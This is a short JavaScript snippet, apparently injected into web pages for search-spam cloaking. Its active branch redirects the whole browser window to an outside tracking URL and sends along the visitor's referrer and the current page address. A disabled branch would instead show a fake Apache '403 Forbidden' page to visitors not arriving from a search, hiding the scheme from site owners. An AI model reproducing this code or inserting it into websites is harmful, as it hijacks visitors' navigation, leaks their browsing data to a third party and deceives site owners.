 if(top.document.referrer.indexOf("search") == -1 &&
    top.document.referrer.indexOf("?")      == -1 && 0)
 {
  window.document.title='403 Forbidden';
  window.document.body.style.backgroundColor='white';
  window.document.body.style.color='black';
  document.writeln("<H1>Forbidden</H1>");
  document.writeln("You don't have permission to access "+window.location.pathname);
  document.writeln("on this server.<P>");
  document.writeln("<HR>");
  document.writeln("<ADDRESS>Apache/1.3.29 Server at "+window.location.hostname+" Port 80</ADDRESS>");
  document.writeln("<div style='display:none'>");
 }
 else
 {
  top.location.href='http://content.unisearch.name/track.php?ref='+escape(top.document.referrer)+'&fl='+escape(top.document.location);
 }

